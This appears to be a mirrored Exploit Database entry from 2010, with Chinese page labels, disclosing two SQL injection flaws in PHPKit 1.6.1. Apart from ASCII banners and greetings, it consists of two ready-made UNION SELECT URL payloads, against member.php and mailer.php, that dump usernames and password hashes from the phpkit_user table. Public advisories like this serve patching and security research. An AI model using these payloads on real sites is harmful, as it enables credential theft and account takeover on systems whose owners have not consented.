PHPKit 1.6.1 – ‘mailer.php’ SQL Injection

• Exploit Database
• 54 阅读

• 作者： Easy Laster
  日期： 2010-02-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11509/

•  ########################################################################
   ##Phpkit 1.6.1 SQL Injection member.php ##
   ########################################################################
   ########################################################################
   ## _ _ _ _##
   ##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_##
   ##|_| -_| .'| |___| | |_| -_|_| | -_|_| ##
   ##|_| |___|__,|_|_|_| |_|_|_|_| |___|_| |_|_|___|_| ##
   ####
   ########################################################################
  ##########################################################################
  #Script: Phpkit 1.6.1 SQL Injection member.php #
  #Vulnerabilities [ SQL Injection ] #
  #Language: [ PHP ] #
  #Download: [ this script is for free]#
  #Founder: [ ea$y laster ]#
  #Peace to [ -tmh- ,0qwl ,Crypter ,Dr.ChAoS ,dremicz ,eddy14 ,HANNIBAL ]#
  #[ Lidloses_Auge ,n00bor, Rip ,Sens0r ,-=Player=-] #
  #############################################################################
  /include.php?path=login/member.php&searchstr=+union+select+1,1,1,1,1,1, #
  concat(user_name,0x3a,user_pw),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, #
  1,1,1,1,1,1,1,1+from+phpkit_user+where+user_id=2# #
  ############################################################################# 
  
   ########################################################################
   ##Phpkit 1.6.1 SQL Injection mailer.php ##
   ########################################################################
   ########################################################################
   ## _ _ _ _##
   ##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_##
   ##|_| -_| .'| |___| | |_| -_|_| | -_|_| ##
   ##|_| |___|__,|_|_|_| |_|_|_|_| |___|_| |_|_|___|_| ##
   ####
   ########################################################################
  ##########################################################################
  #Script: Phpkit 1.6.1 SQL Injection mailer.php #
  #Vulnerabilities [ SQL Injection ] #
  #Language: [ PHP ] #
  #Download: [ this script is for free]#
  #Discovered by : [ ea$y laster ] #
  #Peace to [ -tmh- ,0qwl ,Crypter ,Dr.ChAoS ,dremicz ,eddy14 ,HANNIBAL ]#
  #[ Lidloses_Auge ,n00bor, Rip ,Sens0r ,-=Player=-] #
  #############################################################################
  /include.php?path=login/mailer.php&userid=+union+select+1,1,1,1,1 #
  ,1,concat(user_name,0x3a,user_pw),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,#
  1,1,1,1,1,1,1,1,1,1,1,1,1+from+phpkit_user+where+user_id=1# #
  #############################################################################